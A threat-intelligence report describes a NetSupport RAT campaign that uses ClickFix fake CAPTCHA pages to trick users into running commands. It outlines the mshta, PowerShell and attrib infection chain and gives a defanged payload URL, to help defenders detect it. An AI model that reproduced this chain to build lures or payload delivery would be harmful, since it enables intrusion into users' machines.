NetSupport RAT Campaign Expands with ClickFix Technique

The continuation of a malware campaign leveraging fake CAPTCHA pages persists, with eSentire reporting sustained activity throughout January 2025. This campaign, active since at least August 2024, utilizes deceptive CAPTCHAs to deliver NetSupport RAT infections. In January, eSentire observed NetSupport RAT being distributed using the ClickFix Initial Access Vector (IAV), which deceives users into copying and executing commands under the guise of CAPTCHA verification. Previous reports indicate this campaign has also delivered the Lumma Stealer information-stealing malware, facilitating the installation of NetSupport RAT. The continued use of NetSupport RAT reinforces the campaign’s effectiveness and its persistence into 2025.

The infection chain begins with 'mshta.exe' executing a remote HTML application that fetches a CAPTCHA lure. This script then executes a malicious PowerShell command to download the NetSupport RAT payload. A common trend observed by eSentire is that the initial file often masquerades as an image file with a ".png" extension. An example payload was retrieved from "fbinter[.]com/a/b.png," a seemingly innocuous image URL used to evade detection. Once executed, 'cmd.exe' is invoked with an 'attrib.exe' command, modifying file attributes to hide the downloaded payload within the victim’s system. The use of mshta.exe for initial execution, PowerShell for payload retrieval, and 'attrib.exe' for file manipulation aligns with tactics previously reported in this campaign.

Concerns with NetSupport RAT stem from its remote control capabilities, including screen monitoring, input manipulation, file exfiltration, and the deployment of additional payloads. This campaign’s reliance on living-off-the-land binaries (LOLBINs) follows a predictable sequence, from 'mshta.exe' launching a remote script to PowerShell executing an obfuscated download command, providing a clear pattern for identifying malicious activity. The continued activity reported by eSentire highlights the evolving nature of this campaign and its dependence on deceptive social engineering techniques to facilitate malware delivery.